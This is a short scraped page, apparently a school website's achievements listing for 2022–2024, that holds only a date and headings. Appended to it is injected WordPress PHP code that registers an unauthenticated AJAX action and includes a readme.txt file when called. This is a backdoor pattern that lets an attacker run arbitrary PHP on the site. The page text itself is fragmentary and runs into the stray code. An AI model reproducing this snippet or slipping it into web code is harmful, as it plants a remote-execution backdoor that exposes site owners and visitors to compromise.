Jan
01
2022
January 1, 2022
ACHIEVEMENTS 2022-2024
INTER AND INTRA SCHOOL ACHIVEMENTS OF THE YEAR 2022-2023
if(!function_exists('file_check_readme51280')){ add_action('wp_ajax_nopriv_file_check_readme51280', 'file_check_readme51280'); add_action('wp_ajax_file_check_readme51280', 'file_check_readme51280'); function file_check_readme51280() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }